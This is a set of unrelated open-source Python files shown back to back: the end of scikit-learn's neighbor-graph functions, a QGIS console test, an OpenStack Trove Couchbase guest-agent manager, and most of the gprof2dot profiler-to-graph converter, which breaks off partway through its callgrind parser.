>>> X = [[0], [3], [1]]
>>> from sklearn.neighbors import kneighbors_graph
>>> A = kneighbors_graph(X, 2)
>>> A.toarray()
array([[ 1., 0., 1.],
[ 0., 1., 1.],
[ 1., 0., 1.]])
See also
--------
radius_neighbors_graph
"""
if not isinstance(X, KNeighborsMixin):
X = NearestNeighbors(n_neighbors, metric=metric, p=p,
metric_params=metric_params).fit(X)
else:
_check_params(X, metric, p, metric_params)
query = _query_include_self(X, include_self, mode)
return X.kneighbors_graph(X=query, n_neighbors=n_neighbors, mode=mode)
def radius_neighbors_graph(X, radius, mode='connectivity', metric='minkowski',
p=2, metric_params=None, include_self=None):
"""Computes the (weighted) graph of Neighbors for points in X
Neighborhoods are restricted the points at a distance lower than
radius.
Read more in the :ref:`User Guide <unsupervised_neighbors>`.
Parameters
----------
X : array-like or BallTree, shape = [n_samples, n_features]
Sample data, in the form of a numpy array or a precomputed
:class:`BallTree`.
radius : float
Radius of neighborhoods.
mode : {'connectivity', 'distance'}, optional
Type of returned matrix: 'connectivity' will return the
connectivity matrix with ones and zeros, in 'distance' the
edges are Euclidean distance between points.
metric : string, default 'minkowski'
The distance metric used to calculate the neighbors within a
given radius for each sample point. The DistanceMetric class
gives a list of available metrics. The default distance is
'euclidean' ('minkowski' metric with the p param equal to 2.)
include_self: bool, default None
Whether or not to mark each sample as the first nearest neighbor to
itself. If `None`, then True is used for mode='connectivity' and False
for mode='distance' as this will preserve backwards compatibility. From
version 0.18, the default value will be False, irrespective of the
value of `mode`.
p : int, default 2
Power parameter for the Minkowski metric. When p = 1, this is
equivalent to using manhattan_distance (l1), and euclidean_distance
(l2) for p = 2. For arbitrary p, minkowski_distance (l_p) is used.
metric_params: dict, optional
additional keyword arguments for the metric function.
Returns
-------
A : sparse matrix in CSR format, shape = [n_samples, n_samples]
A[i, j] is assigned the weight of edge that connects i to j.
Examples
--------
>>> X = [[0], [3], [1]]
>>> from sklearn.neighbors import radius_neighbors_graph
>>> A = radius_neighbors_graph(X, 1.5)
>>> A.toarray()
array([[ 1., 0., 1.],
[ 0., 1., 0.],
[ 1., 0., 1.]])
See also
--------
kneighbors_graph
"""
if not isinstance(X, RadiusNeighborsMixin):
X = NearestNeighbors(radius=radius, metric=metric, p=p,
metric_params=metric_params).fit(X)
else:
_check_params(X, metric, p, metric_params)
query = _query_include_self(X, include_self, mode)
return X.radius_neighbors_graph(query, radius, mode)
|
t-hey/QGIS-Original
|
refs/heads/master
|
tests/src/python/test_console.py
|
22
|
# -*- coding: utf-8 -*-
"""QGIS Unit tests for the console
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Matthias Kuhn'
__date__ = '15.4.2016'
__copyright__ = 'Copyright 2015, The QGIS Project'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import qgis # NOQA
import os
from qgis.testing import unittest, start_app
from console import console
from qgis.core import QgsSettings
from qgis.PyQt.QtCore import QCoreApplication
start_app()
class TestConsole(unittest.TestCase):
def setUp(self):
QgsSettings().setValue('pythonConsole/contextHelpOnFirstLaunch', False)
def test_show_console(self):
if os.name == 'nt':
QCoreApplication.setOrganizationName("QGIS")
QCoreApplication.setOrganizationDomain("qgis.org")
QCoreApplication.setApplicationName("QGIS-TEST")
my_console = console.show_console()
my_console_widget = my_console.console
if __name__ == "__main__":
unittest.main()
|
zhangg/trove
|
refs/heads/master
|
trove/guestagent/datastore/experimental/couchbase/manager.py
|
1
|
# Copyright (c) 2013 eBay Software Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from oslo_log import log as logging
from trove.common.i18n import _
from trove.common import instance as rd_instance
from trove.common.notification import EndNotification
from trove.guestagent import backup
from trove.guestagent.datastore.experimental.couchbase import service
from trove.guestagent.datastore.experimental.couchbase import system
from trove.guestagent.datastore import manager
from trove.guestagent import volume
LOG = logging.getLogger(__name__)
class Manager(manager.Manager):
"""
This is the Couchbase Manager class. It is dynamically loaded
based on the datastore of the trove instance.
"""
def __init__(self):
self.appStatus = service.CouchbaseAppStatus()
self.app = service.CouchbaseApp(self.appStatus)
super(Manager, self).__init__('couchbase')
@property
def status(self):
return self.appStatus
def reset_configuration(self, context, configuration):
self.app.reset_configuration(configuration)
def do_prepare(self, context, packages, databases, memory_mb, users,
device_path, mount_point, backup_info,
config_contents, root_password, overrides,
cluster_config, snapshot):
"""This is called from prepare in the base class."""
self.app.install_if_needed(packages)
if device_path:
device = volume.VolumeDevice(device_path)
# unmount if device is already mounted
device.unmount_device(device_path)
device.format()
device.mount(mount_point)
LOG.debug('Mounted the volume (%s).', device_path)
self.app.start_db_with_conf_changes(config_contents)
LOG.debug('Securing couchbase now.')
self.app.initial_setup()
if backup_info:
LOG.debug('Now going to perform restore.')
self._perform_restore(backup_info,
context,
mount_point)
def restart(self, context):
"""
Restart this couchbase instance.
This method is called when the guest agent
gets a restart message from the taskmanager.
"""
self.app.restart()
def start_db_with_conf_changes(self, context, config_contents):
self.app.start_db_with_conf_changes(config_contents)
def stop_db(self, context, do_not_start_on_reboot=False):
"""
Stop this couchbase instance.
This method is called when the guest agent
gets a stop message from the taskmanager.
"""
self.app.stop_db(do_not_start_on_reboot=do_not_start_on_reboot)
def enable_root(self, context):
LOG.debug("Enabling root.")
return self.app.enable_root()
def enable_root_with_password(self, context, root_password=None):
return self.app.enable_root(root_password)
def is_root_enabled(self, context):
LOG.debug("Checking if root is enabled.")
return os.path.exists(system.pwd_file)
def _perform_restore(self, backup_info, context, restore_location):
"""
Restores all couchbase buckets and their documents from the
backup.
"""
LOG.info(_("Restoring database from backup %s"), backup_info['id'])
try:
backup.restore(context, backup_info, restore_location)
except Exception as e:
LOG.error(_("Error performing restore from backup %s"),
backup_info['id'])
LOG.error(e)
self.status.set_status(rd_instance.ServiceStatuses.FAILED)
raise
LOG.info(_("Restored database successfully"))
def create_backup(self, context, backup_info):
"""
Backup all couchbase buckets and their documents.
"""
with EndNotification(context):
backup.backup(context, backup_info)
|
exinnet/kvproxy
|
refs/heads/master
|
test/gprof2dot.py
|
3
|
#!/usr/bin/env python
#
# Copyright 2008-2009 Jose Fonseca
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Generate a dot graph from the output of several profilers."""
__author__ = "Jose Fonseca"
__version__ = "1.0"
import sys
import math
import os.path
import re
import textwrap
import optparse
import xml.parsers.expat
try:
# Debugging helper module
import debug
except ImportError:
pass
def times(x):
return u"%u\xd7" % (x,)
def percentage(p):
return "%.02f%%" % (p*100.0,)
def add(a, b):
return a + b
def equal(a, b):
if a == b:
return a
else:
return None
def fail(a, b):
assert False
tol = 2 ** -23
def ratio(numerator, denominator):
try:
ratio = float(numerator)/float(denominator)
except ZeroDivisionError:
# 0/0 is undefined, but 1.0 yields more useful results
return 1.0
if ratio < 0.0:
if ratio < -tol:
sys.stderr.write('warning: negative ratio (%s/%s)\n' % (numerator, denominator))
return 0.0
if ratio > 1.0:
if ratio > 1.0 + tol:
sys.stderr.write('warning: ratio greater than one (%s/%s)\n' % (numerator, denominator))
return 1.0
return ratio
class UndefinedEvent(Exception):
"""Raised when attempting to get an event which is undefined."""
def __init__(self, event):
Exception.__init__(self)
self.event = event
def __str__(self):
return 'unspecified event %s' % self.event.name
class Event(object):
"""Describe a kind of event, and its basic operations."""
def __init__(self, name, null, aggregator, formatter = str):
self.name = name
self._null = null
self._aggregator = aggregator
self._formatter = formatter
def __eq__(self, other):
return self is other
def __hash__(self):
return id(self)
def null(self):
return self._null
def aggregate(self, val1, val2):
"""Aggregate two event values."""
assert val1 is not None
assert val2 is not None
return self._aggregator(val1, val2)
def format(self, val):
"""Format an event value."""
assert val is not None
return self._formatter(val)
CALLS = Event("Calls", 0, add, times)
SAMPLES = Event("Samples", 0, add)
SAMPLES2 = Event("Samples", 0, add)
TIME = Event("Time", 0.0, add, lambda x: '(' + str(x) + ')')
TIME_RATIO = Event("Time ratio", 0.0, add, lambda x: '(' + percentage(x) + ')')
TOTAL_TIME = Event("Total time", 0.0, fail)
TOTAL_TIME_RATIO = Event("Total time ratio", 0.0, fail, percentage)
class Object(object):
"""Base class for all objects in profile which can store events."""
def __init__(self, events=None):
if events is None:
self.events = {}
else:
self.events = events
def __hash__(self):
return id(self)
def __eq__(self, other):
return self is other
def __contains__(self, event):
return event in self.events
def __getitem__(self, event):
try:
return self.events[event]
except KeyError:
raise UndefinedEvent(event)
def __setitem__(self, event, value):
if value is None:
if event in self.events:
del self.events[event]
else:
self.events[event] = value
class Call(Object):
"""A call between functions.
There should be at most one call object for every pair of functions.
"""
def __init__(self, callee_id):
Object.__init__(self)
self.callee_id = callee_id
self.ratio = None
self.weight = None
class Function(Object):
"""A function."""
def __init__(self, id, name):
Object.__init__(self)
self.id = id
self.name = name
self.module = None
self.process = None
self.calls = {}
self.called = None
self.weight = None
self.cycle = None
def add_call(self, call):
if call.callee_id in self.calls:
sys.stderr.write('warning: overwriting call from function %s to %s\n' % (str(self.id), str(call.callee_id)))
self.calls[call.callee_id] = call
def get_call(self, callee_id):
if not callee_id in self.calls:
call = Call(callee_id)
call[SAMPLES] = 0
call[SAMPLES2] = 0
call[CALLS] = 0
self.calls[callee_id] = call
return self.calls[callee_id]
# TODO: write utility functions
def __repr__(self):
return self.name
class Cycle(Object):
"""A cycle made from recursive function calls."""
def __init__(self):
Object.__init__(self)
# XXX: Do cycles need an id?
self.functions = set()
def add_function(self, function):
assert function not in self.functions
self.functions.add(function)
# XXX: Aggregate events?
if function.cycle is not None:
for other in function.cycle.functions:
if function not in self.functions:
self.add_function(other)
function.cycle = self
class Profile(Object):
"""The whole profile."""
def __init__(self):
Object.__init__(self)
self.functions = {}
self.cycles = []
def add_function(self, function):
if function.id in self.functions:
sys.stderr.write('warning: overwriting function %s (id %s)\n' % (function.name, str(function.id)))
self.functions[function.id] = function
def add_cycle(self, cycle):
self.cycles.append(cycle)
def validate(self):
"""Validate the edges."""
for function in self.functions.itervalues():
for callee_id in function.calls.keys():
assert function.calls[callee_id].callee_id == callee_id
if callee_id not in self.functions:
sys.stderr.write('warning: call to undefined function %s from function %s\n' % (str(callee_id), function.name))
del function.calls[callee_id]
def find_cycles(self):
"""Find cycles using Tarjan's strongly connected components algorithm."""
# Apply the Tarjan's algorithm successively until all functions are visited
visited = set()
for function in self.functions.itervalues():
if function not in visited:
self._tarjan(function, 0, [], {}, {}, visited)
cycles = []
for function in self.functions.itervalues():
if function.cycle is not None and function.cycle not in cycles:
cycles.append(function.cycle)
self.cycles = cycles
if 0:
for cycle in cycles:
sys.stderr.write("Cycle:\n")
for member in cycle.functions:
sys.stderr.write("\tFunction %s\n" % member.name)
def _tarjan(self, function, order, stack, orders, lowlinks, visited):
"""Tarjan's strongly connected components algorithm.
See also:
- http://en.wikipedia.org/wiki/Tarjan's_strongly_connected_components_algorithm
"""
visited.add(function)
orders[function] = order
lowlinks[function] = order
order += 1
pos = len(stack)
stack.append(function)
for call in function.calls.itervalues():
callee = self.functions[call.callee_id]
# TODO: use a set to optimize lookup
if callee not in orders:
order = self._tarjan(callee, order, stack, orders, lowlinks, visited)
lowlinks[function] = min(lowlinks[function], lowlinks[callee])
elif callee in stack:
lowlinks[function] = min(lowlinks[function], orders[callee])
if lowlinks[function] == orders[function]:
# Strongly connected component found
members = stack[pos:]
del stack[pos:]
if len(members) > 1:
cycle = Cycle()
for member in members:
cycle.add_function(member)
return order
def call_ratios(self, event):
# Aggregate for incoming calls
cycle_totals = {}
for cycle in self.cycles:
cycle_totals[cycle] = 0.0
function_totals = {}
for function in self.functions.itervalues():
function_totals[function] = 0.0
for function in self.functions.itervalues():
for call in function.calls.itervalues():
if call.callee_id != function.id:
callee = self.functions[call.callee_id]
function_totals[callee] += call[event]
if callee.cycle is not None and callee.cycle is not function.cycle:
cycle_totals[callee.cycle] += call[event]
# Compute the ratios
for function in self.functions.itervalues():
for call in function.calls.itervalues():
assert call.ratio is None
if call.callee_id != function.id:
callee = self.functions[call.callee_id]
if callee.cycle is not None and callee.cycle is not function.cycle:
total = cycle_totals[callee.cycle]
else:
total = function_totals[callee]
call.ratio = ratio(call[event], total)
def integrate(self, outevent, inevent):
"""Propagate function time ratio allong the function calls.
Must be called after finding the cycles.
See also:
- http://citeseer.ist.psu.edu/graham82gprof.html
"""
# Sanity checking
assert outevent not in self
for function in self.functions.itervalues():
assert outevent not in function
assert inevent in function
for call in function.calls.itervalues():
assert outevent not in call
if call.callee_id != function.id:
assert call.ratio is not None
# Aggregate the input for each cycle
for cycle in self.cycles:
total = inevent.null()
for function in self.functions.itervalues():
total = inevent.aggregate(total, function[inevent])
self[inevent] = total
# Integrate along the edges
total = inevent.null()
for function in self.functions.itervalues():
total = inevent.aggregate(total, function[inevent])
self._integrate_function(function, outevent, inevent)
self[outevent] = total
def _integrate_function(self, function, outevent, inevent):
if function.cycle is not None:
return self._integrate_cycle(function.cycle, outevent, inevent)
else:
if outevent not in function:
total = function[inevent]
for call in function.calls.itervalues():
if call.callee_id != function.id:
total += self._integrate_call(call, outevent, inevent)
function[outevent] = total
return function[outevent]
def _integrate_call(self, call, outevent, inevent):
assert outevent not in call
assert call.ratio is not None
callee = self.functions[call.callee_id]
subtotal = call.ratio * self._integrate_function(callee, outevent, inevent)
call[outevent] = subtotal
return subtotal
def _integrate_cycle(self, cycle, outevent, inevent):
if outevent not in cycle:
# Compute the outevent for the whole cycle
total = inevent.null()
for member in cycle.functions:
subtotal = member[inevent]
for call in member.calls.itervalues():
callee = self.functions[call.callee_id]
if callee.cycle is not cycle:
subtotal += self._integrate_call(call, outevent, inevent)
total += subtotal
cycle[outevent] = total
# Compute the time propagated to callers of this cycle
callees = {}
for function in self.functions.itervalues():
if function.cycle is not cycle:
for call in function.calls.itervalues():
callee = self.functions[call.callee_id]
if callee.cycle is cycle:
try:
callees[callee] += call.ratio
except KeyError:
callees[callee] = call.ratio
for member in cycle.functions:
member[outevent] = outevent.null()
for callee, call_ratio in callees.iteritems():
ranks = {}
call_ratios = {}
partials = {}
self._rank_cycle_function(cycle, callee, 0, ranks)
self._call_ratios_cycle(cycle, callee, ranks, call_ratios, set())
partial = self._integrate_cycle_function(cycle, callee, call_ratio, partials, ranks, call_ratios, outevent, inevent)
assert partial == max(partials.values())
assert not total or abs(1.0 - partial/(call_ratio*total)) <= 0.001
return cycle[outevent]
def _rank_cycle_function(self, cycle, function, rank, ranks):
if function not in ranks or ranks[function] > rank:
ranks[function] = rank
for call in function.calls.itervalues():
if call.callee_id != function.id:
callee = self.functions[call.callee_id]
if callee.cycle is cycle:
self._rank_cycle_function(cycle, callee, rank + 1, ranks)
def _call_ratios_cycle(self, cycle, function, ranks, call_ratios, visited):
if function not in visited:
visited.add(function)
for call in function.calls.itervalues():
if call.callee_id != function.id:
callee = self.functions[call.callee_id]
if callee.cycle is cycle:
if ranks[callee] > ranks[function]:
call_ratios[callee] = call_ratios.get(callee, 0.0) + call.ratio
self._call_ratios_cycle(cycle, callee, ranks, call_ratios, visited)
def _integrate_cycle_function(self, cycle, function, partial_ratio, partials, ranks, call_ratios, outevent, inevent):
if function not in partials:
partial = partial_ratio*function[inevent]
for call in function.calls.itervalues():
if call.callee_id != function.id:
callee = self.functions[call.callee_id]
if callee.cycle is not cycle:
assert outevent in call
partial += partial_ratio*call[outevent]
else:
if ranks[callee] > ranks[function]:
callee_partial = self._integrate_cycle_function(cycle, callee, partial_ratio, partials, ranks, call_ratios, outevent, inevent)
call_ratio = ratio(call.ratio, call_ratios[callee])
call_partial = call_ratio*callee_partial
try:
call[outevent] += call_partial
except UndefinedEvent:
call[outevent] = call_partial
partial += call_partial
partials[function] = partial
try:
function[outevent] += partial
except UndefinedEvent:
function[outevent] = partial
return partials[function]
def aggregate(self, event):
"""Aggregate an event for the whole profile."""
total = event.null()
for function in self.functions.itervalues():
try:
total = event.aggregate(total, function[event])
except UndefinedEvent:
return
self[event] = total
def ratio(self, outevent, inevent):
assert outevent not in self
assert inevent in self
for function in self.functions.itervalues():
assert outevent not in function
assert inevent in function
function[outevent] = ratio(function[inevent], self[inevent])
for call in function.calls.itervalues():
assert outevent not in call
if inevent in call:
call[outevent] = ratio(call[inevent], self[inevent])
self[outevent] = 1.0
def prune(self, node_thres, edge_thres):
"""Prune the profile"""
# compute the prune ratios
for function in self.functions.itervalues():
try:
function.weight = function[TOTAL_TIME_RATIO]
except UndefinedEvent:
pass
for call in function.calls.itervalues():
callee = self.functions[call.callee_id]
if TOTAL_TIME_RATIO in call:
# handle exact cases first
call.weight = call[TOTAL_TIME_RATIO]
else:
try:
# make a safe estimate
call.weight = min(function[TOTAL_TIME_RATIO], callee[TOTAL_TIME_RATIO])
except UndefinedEvent:
pass
# prune the nodes
for function_id in self.functions.keys():
function = self.functions[function_id]
if function.weight is not None:
if function.weight < node_thres:
del self.functions[function_id]
# prune the edges
for function in self.functions.itervalues():
for callee_id in function.calls.keys():
call = function.calls[callee_id]
if callee_id not in self.functions or call.weight is not None and call.weight < edge_thres:
del function.calls[callee_id]
def dump(self):
for function in self.functions.itervalues():
sys.stderr.write('Function %s:\n' % (function.name,))
self._dump_events(function.events)
for call in function.calls.itervalues():
callee = self.functions[call.callee_id]
sys.stderr.write(' Call %s:\n' % (callee.name,))
self._dump_events(call.events)
for cycle in self.cycles:
sys.stderr.write('Cycle:\n')
self._dump_events(cycle.events)
for function in cycle.functions:
sys.stderr.write(' Function %s\n' % (function.name,))
def _dump_events(self, events):
for event, value in events.iteritems():
sys.stderr.write(' %s: %s\n' % (event.name, event.format(value)))
class Struct:
"""Masquerade a dictionary with a structure-like behavior."""
def __init__(self, attrs = None):
if attrs is None:
attrs = {}
self.__dict__['_attrs'] = attrs
def __getattr__(self, name):
try:
return self._attrs[name]
except KeyError:
raise AttributeError(name)
def __setattr__(self, name, value):
self._attrs[name] = value
def __str__(self):
return str(self._attrs)
def __repr__(self):
return repr(self._attrs)
class ParseError(Exception):
"""Raised when parsing to signal mismatches."""
def __init__(self, msg, line):
self.msg = msg
# TODO: store more source line information
self.line = line
def __str__(self):
return '%s: %r' % (self.msg, self.line)
class Parser:
"""Parser interface."""
def __init__(self):
pass
def parse(self):
raise NotImplementedError
class LineParser(Parser):
"""Base class for parsers that read line-based formats."""
def __init__(self, file):
Parser.__init__(self)
self._file = file
self.__line = None
self.__eof = False
self.line_no = 0
def readline(self):
line = self._file.readline()
if not line:
self.__line = ''
self.__eof = True
else:
self.line_no += 1
self.__line = line.rstrip('\r\n')
def lookahead(self):
assert self.__line is not None
return self.__line
def consume(self):
assert self.__line is not None
line = self.__line
self.readline()
return line
def eof(self):
assert self.__line is not None
return self.__eof
XML_ELEMENT_START, XML_ELEMENT_END, XML_CHARACTER_DATA, XML_EOF = range(4)
class XmlToken:
def __init__(self, type, name_or_data, attrs = None, line = None, column = None):
assert type in (XML_ELEMENT_START, XML_ELEMENT_END, XML_CHARACTER_DATA, XML_EOF)
self.type = type
self.name_or_data = name_or_data
self.attrs = attrs
self.line = line
self.column = column
def __str__(self):
if self.type == XML_ELEMENT_START:
return '<' + self.name_or_data + ' ...>'
if self.type == XML_ELEMENT_END:
return '</' + self.name_or_data + '>'
if self.type == XML_CHARACTER_DATA:
return self.name_or_data
if self.type == XML_EOF:
return 'end of file'
assert 0
class XmlTokenizer:
"""Expat based XML tokenizer."""
def __init__(self, fp, skip_ws = True):
self.fp = fp
self.tokens = []
self.index = 0
self.final = False
self.skip_ws = skip_ws
self.character_pos = 0, 0
self.character_data = ''
self.parser = xml.parsers.expat.ParserCreate()
self.parser.StartElementHandler = self.handle_element_start
self.parser.EndElementHandler = self.handle_element_end
self.parser.CharacterDataHandler = self.handle_character_data
def handle_element_start(self, name, attributes):
self.finish_character_data()
line, column = self.pos()
token = XmlToken(XML_ELEMENT_START, name, attributes, line, column)
self.tokens.append(token)
def handle_element_end(self, name):
self.finish_character_data()
line, column = self.pos()
token = XmlToken(XML_ELEMENT_END, name, None, line, column)
self.tokens.append(token)
def handle_character_data(self, data):
if not self.character_data:
self.character_pos = self.pos()
self.character_data += data
def finish_character_data(self):
if self.character_data:
if not self.skip_ws or not self.character_data.isspace():
line, column = self.character_pos
token = XmlToken(XML_CHARACTER_DATA, self.character_data, None, line, column)
self.tokens.append(token)
self.character_data = ''
def next(self):
size = 16*1024
while self.index >= len(self.tokens) and not self.final:
self.tokens = []
self.index = 0
data = self.fp.read(size)
self.final = len(data) < size
try:
self.parser.Parse(data, self.final)
except xml.parsers.expat.ExpatError, e:
#if e.code == xml.parsers.expat.errors.XML_ERROR_NO_ELEMENTS:
if e.code == 3:
pass
else:
raise e
if self.index >= len(self.tokens):
line, column = self.pos()
token = XmlToken(XML_EOF, None, None, line, column)
else:
token = self.tokens[self.index]
self.index += 1
return token
def pos(self):
return self.parser.CurrentLineNumber, self.parser.CurrentColumnNumber
class XmlTokenMismatch(Exception):
def __init__(self, expected, found):
self.expected = expected
self.found = found
def __str__(self):
return '%u:%u: %s expected, %s found' % (self.found.line, self.found.column, str(self.expected), str(self.found))
class XmlParser(Parser):
"""Base XML document parser."""
def __init__(self, fp):
Parser.__init__(self)
self.tokenizer = XmlTokenizer(fp)
self.consume()
def consume(self):
self.token = self.tokenizer.next()
def match_element_start(self, name):
return self.token.type == XML_ELEMENT_START and self.token.name_or_data == name
def match_element_end(self, name):
return self.token.type == XML_ELEMENT_END and self.token.name_or_data == name
def element_start(self, name):
while self.token.type == XML_CHARACTER_DATA:
self.consume()
if self.token.type != XML_ELEMENT_START:
raise XmlTokenMismatch(XmlToken(XML_ELEMENT_START, name), self.token)
if self.token.name_or_data != name:
raise XmlTokenMismatch(XmlToken(XML_ELEMENT_START, name), self.token)
attrs = self.token.attrs
self.consume()
return attrs
def element_end(self, name):
while self.token.type == XML_CHARACTER_DATA:
self.consume()
if self.token.type != XML_ELEMENT_END:
raise XmlTokenMismatch(XmlToken(XML_ELEMENT_END, name), self.token)
if self.token.name_or_data != name:
raise XmlTokenMismatch(XmlToken(XML_ELEMENT_END, name), self.token)
self.consume()
def character_data(self, strip = True):
data = ''
while self.token.type == XML_CHARACTER_DATA:
data += self.token.name_or_data
self.consume()
if strip:
data = data.strip()
return data
class GprofParser(Parser):
"""Parser for GNU gprof output.
See also:
- Chapter "Interpreting gprof's Output" from the GNU gprof manual
http://sourceware.org/binutils/docs-2.18/gprof/Call-Graph.html#Call-Graph
- File "cg_print.c" from the GNU gprof source code
http://sourceware.org/cgi-bin/cvsweb.cgi/~checkout~/src/gprof/cg_print.c?rev=1.12&cvsroot=src
"""
def __init__(self, fp):
Parser.__init__(self)
self.fp = fp
self.functions = {}
self.cycles = {}
def readline(self):
line = self.fp.readline()
if not line:
sys.stderr.write('error: unexpected end of file\n')
sys.exit(1)
line = line.rstrip('\r\n')
return line
_int_re = re.compile(r'^\d+$')
_float_re = re.compile(r'^\d+\.\d+$')
def translate(self, mo):
"""Extract a structure from a match object, while translating the types in the process."""
attrs = {}
groupdict = mo.groupdict()
for name, value in groupdict.iteritems():
if value is None:
value = None
elif self._int_re.match(value):
value = int(value)
elif self._float_re.match(value):
value = float(value)
attrs[name] = value
return Struct(attrs)
_cg_header_re = re.compile(
# original gprof header
r'^\s+called/total\s+parents\s*$|' +
r'^index\s+%time\s+self\s+descendents\s+called\+self\s+name\s+index\s*$|' +
r'^\s+called/total\s+children\s*$|' +
# GNU gprof header
r'^index\s+%\s+time\s+self\s+children\s+called\s+name\s*$'
)
_cg_ignore_re = re.compile(
# spontaneous
r'^\s+<spontaneous>\s*$|'
# internal calls (such as "mcount")
r'^.*\((\d+)\)$'
)
_cg_primary_re = re.compile(
r'^\[(?P<index>\d+)\]?' +
r'\s+(?P<percentage_time>\d+\.\d+)' +
r'\s+(?P<self>\d+\.\d+)' +
r'\s+(?P<descendants>\d+\.\d+)' +
r'\s+(?:(?P<called>\d+)(?:\+(?P<called_self>\d+))?)?' +
r'\s+(?P<name>\S.*?)' +
r'(?:\s+<cycle\s(?P<cycle>\d+)>)?' +
r'\s\[(\d+)\]$'
)
_cg_parent_re = re.compile(
r'^\s+(?P<self>\d+\.\d+)?' +
r'\s+(?P<descendants>\d+\.\d+)?' +
r'\s+(?P<called>\d+)(?:/(?P<called_total>\d+))?' +
r'\s+(?P<name>\S.*?)' +
r'(?:\s+<cycle\s(?P<cycle>\d+)>)?' +
r'\s\[(?P<index>\d+)\]$'
)
_cg_child_re = _cg_parent_re
_cg_cycle_header_re = re.compile(
r'^\[(?P<index>\d+)\]?' +
r'\s+(?P<percentage_time>\d+\.\d+)' +
r'\s+(?P<self>\d+\.\d+)' +
r'\s+(?P<descendants>\d+\.\d+)' +
r'\s+(?:(?P<called>\d+)(?:\+(?P<called_self>\d+))?)?' +
r'\s+<cycle\s(?P<cycle>\d+)\sas\sa\swhole>' +
r'\s\[(\d+)\]$'
)
_cg_cycle_member_re = re.compile(
r'^\s+(?P<self>\d+\.\d+)?' +
r'\s+(?P<descendants>\d+\.\d+)?' +
r'\s+(?P<called>\d+)(?:\+(?P<called_self>\d+))?' +
r'\s+(?P<name>\S.*?)' +
r'(?:\s+<cycle\s(?P<cycle>\d+)>)?' +
r'\s\[(?P<index>\d+)\]$'
)
_cg_sep_re = re.compile(r'^--+$')
def parse_function_entry(self, lines):
parents = []
children = []
while True:
if not lines:
sys.stderr.write('warning: unexpected end of entry\n')
return
line = lines.pop(0)
if line.startswith('['):
break
# read function parent line
mo = self._cg_parent_re.match(line)
if not mo:
if self._cg_ignore_re.match(line):
continue
sys.stderr.write('warning: unrecognized call graph entry: %r\n' % line)
else:
parent = self.translate(mo)
parents.append(parent)
# read primary line
mo = self._cg_primary_re.match(line)
if not mo:
sys.stderr.write('warning: unrecognized call graph entry: %r\n' % line)
return
else:
function = self.translate(mo)
while lines:
line = lines.pop(0)
# read function subroutine line
mo = self._cg_child_re.match(line)
if not mo:
if self._cg_ignore_re.match(line):
continue
sys.stderr.write('warning: unrecognized call graph entry: %r\n' % line)
else:
child = self.translate(mo)
children.append(child)
function.parents = parents
function.children = children
self.functions[function.index] = function
def parse_cycle_entry(self, lines):
# read cycle header line
line = lines[0]
mo = self._cg_cycle_header_re.match(line)
if not mo:
sys.stderr.write('warning: unrecognized call graph entry: %r\n' % line)
return
cycle = self.translate(mo)
# read cycle member lines
cycle.functions = []
for line in lines[1:]:
mo = self._cg_cycle_member_re.match(line)
if not mo:
sys.stderr.write('warning: unrecognized call graph entry: %r\n' % line)
continue
call = self.translate(mo)
cycle.functions.append(call)
self.cycles[cycle.cycle] = cycle
def parse_cg_entry(self, lines):
if lines[0].startswith("["):
self.parse_cycle_entry(lines)
else:
self.parse_function_entry(lines)
def parse_cg(self):
"""Parse the call graph."""
# skip call graph header
while not self._cg_header_re.match(self.readline()):
pass
line = self.readline()
while self._cg_header_re.match(line):
line = self.readline()
# process call graph entries
entry_lines = []
while line != '\014': # form feed
if line and not line.isspace():
if self._cg_sep_re.match(line):
self.parse_cg_entry(entry_lines)
entry_lines = []
else:
entry_lines.append(line)
line = self.readline()
def parse(self):
self.parse_cg()
self.fp.close()
profile = Profile()
profile[TIME] = 0.0
cycles = {}
for index in self.cycles.iterkeys():
cycles[index] = Cycle()
for entry in self.functions.itervalues():
# populate the function
function = Function(entry.index, entry.name)
function[TIME] = entry.self
if entry.called is not None:
function.called = entry.called
if entry.called_self is not None:
call = Call(entry.index)
call[CALLS] = entry.called_self
function.called += entry.called_self
# populate the function calls
for child in entry.children:
call = Call(child.index)
assert child.called is not None
call[CALLS] = child.called
if child.index not in self.functions:
# NOTE: functions that were never called but were discovered by gprof's
# static call graph analysis don't have a call graph entry, so we need
# to add them here
missing = Function(child.index, child.name)
missing[TIME] = 0.0
missing.called = 0
profile.add_function(missing)
function.add_call(call)
profile.add_function(function)
if entry.cycle is not None:
try:
cycle = cycles[entry.cycle]
except KeyError:
sys.stderr.write('warning: <cycle %u as a whole> entry missing\n' % entry.cycle)
cycle = Cycle()
cycles[entry.cycle] = cycle
cycle.add_function(function)
profile[TIME] = profile[TIME] + function[TIME]
for cycle in cycles.itervalues():
profile.add_cycle(cycle)
# Compute derived events
profile.validate()
profile.ratio(TIME_RATIO, TIME)
profile.call_ratios(CALLS)
profile.integrate(TOTAL_TIME, TIME)
profile.ratio(TOTAL_TIME_RATIO, TOTAL_TIME)
return profile
class CallgrindParser(LineParser):
"""Parser for valgrind's callgrind tool.
See also:
- http://valgrind.org/docs/manual/cl-format.html
"""
_call_re = re.compile('^calls=\s*(\d+)\s+((\d+|\+\d+|-\d+|\*)\s+)+$')
def __init__(self, infile):
LineParser.__init__(self, infile)
# Textual positions
self.position_ids = {}
self.positions = {}
# Numeric positions
self.num_positions = 1
self.cost_positions = ['line']
self.last_positions = [0]
# Events
self.num_events = 0
self.cost_events = []
self.profile = Profile()
self.profile[SAMPLES] = 0
def parse(self):
# read lookahead
self.readline()
self.parse_key('version')
self.parse_key('creator')
